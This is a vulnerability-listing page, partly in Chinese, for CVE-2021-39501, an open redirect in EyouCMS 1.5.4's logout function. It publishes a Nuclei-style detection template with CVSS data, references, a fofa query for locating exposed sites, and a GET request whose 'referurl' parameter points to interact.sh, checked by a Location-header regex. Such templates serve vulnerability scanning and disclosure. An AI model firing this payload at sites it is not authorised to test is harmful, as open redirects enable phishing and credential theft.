CVE-2021-39501: EyouCMS 1.5.4 Open Redirect

日期: 2025-08-01 | 影响软件: EyouCMS 1.5.4 | POC: 已公开

漏洞描述

EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.

PoC代码[已公开]

id: CVE-2021-39501

info:
  name: EyouCMS 1.5.4 Open Redirect
  author: 0x_Akoko
  severity: medium
  description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.
  impact: |
    Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of EyouCMS to mitigate the vulnerability.
  reference:
    - https://github.com/eyoucms/eyoucms/issues/17
    - https://github.com/KietNA-HPT/CVE
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39501
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-39501
    cwe-id: CWE-601
    epss-score: 0.62491
    epss-percentile: 0.98278
    cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: eyoucms
    product: eyoucms
    fofa-query: title="eyoucms"
  tags: cve2021,cve,redirect,eyoucms,cms,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# digest: 4a0a00473045022100bc6ef7a420133652dbe1424a1606acbb2bc90d13d2c3fd9a6add5dc079be44a50220474e10f0e40df62dfe10943469832b75f1cd851fade0f9d191c9df845ef86f38:922c64590222798bb761d5b6d8e72950

相关漏洞推荐